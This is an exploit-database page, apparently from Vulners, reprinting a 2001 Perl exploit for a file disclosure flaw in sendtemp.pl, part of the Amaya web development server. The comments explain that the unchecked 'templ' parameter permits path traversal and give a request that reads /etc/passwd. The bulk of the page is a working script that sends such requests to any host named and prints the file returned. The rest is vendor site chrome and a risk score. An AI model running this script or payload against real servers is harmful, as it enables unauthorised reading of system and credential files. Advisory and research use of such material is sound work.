Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

sendtemp.pl Read Access to Files

🗓️ 04 Mar 2001 00:00:00Reported by Tom ParkerType 
zdt
 zdt🔗 0day.today👁 64 Views

File disclosure vulnerability in sendtemp.pl allows remote read access to server files.

Code
================================
sendtemp.pl Read Access to Files
================================





#!/usr/bin/perl -w

# sendtemp.pl: A part of the Amaya Web development
# server contains a file disclosure  vulnerability, 
# which allows remote, read access to files 
# on the servers file system,  as whichever 
# user the httpd is running as.
#
# The Vulnerability is really quite simple..
# When the `templ` argument is past to
# sendtemp.pl it adds a link to the chosen stylesheet
# and a META field containing the publication's 
# URL of the new file to the chosen template.
# For example:
# http://localhost/cgi-bin/sendtemp.pl?templ=template.xml
# This is all well and good,  however.. 
# There is no sanity checking on the param you pass to the script..
# Ie: my $temp_file = param("templ");
#
# So by simply issuing a GET to:
# "http://localhost/cgi-bin/sendtemp.pl?templ=../../etc/passwd"
# The systems file system can be traversed and the passwd file can be read. 
# (Assuming the http daemon hasn't been run under chroot())
#
# Follows is a simple exploit.. however, its just as easy 
# to do this manually in your web browser.
# I really couldnt be bothered to format the output in any way,
# It only encourages script kiddies.
#
# Finally, "l33t hax0r greetz" to..
# ne0h, b0red, loophole, shad0w and the old dL crew..
# Scott, Jim, Mike.. All of the guys at Global Intersec.
#
# Tom Parker - [email protected]
# MRX of HHP-Programming (www.hhp-programming.net)
# Global InterSec INC California - Security Audits, Penetration testing, code auditing.

use IO::Socket;
print qq~
----------------------------------------------------------
W3.ORG sendtemp.pl exploit by Tom Parker - tom\@rooted.net
    MRX of HHP-Programming (www.hhp-programming.net)
	  -  Global InterSec INC California -
----------------------------------------------------------
~;
if((!defined($ARGV[0]))||(!defined($ARGV[1]))) { print "Usage\: \%filename\.pl \<hostname\> \<file-to-get\>\n"; exit 0; }
$SOCKET = IO::Socket::INET->new("$ARGV[0]:80");
print $SOCKET "GET /cgi-bin/sendtemp.pl?templ=$ARGV[1]\n";
print "Sent request for $ARGV[1] (http://$ARGV[0]/cgi-bin/sendtemp.pl\?templ\=$ARGV[1])\n";
while(<$SOCKET>) {
push @DATA, $_;

}
my $woot = join(' ',@DATA);
if($woot =~/$ARGV[1] wasn't found/) { print "$ARGV[1] dosnt seem to exist.\n"; exit 0; } 
else { print "@DATA"; }



#  0day.today [2018-03-20]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Mar 2001 00:00Current
7.1High risk
Vulners AI Score7.1
file disclosure vulnerabilityremote read accessserver filesno sanity checkingtemplate parameter
64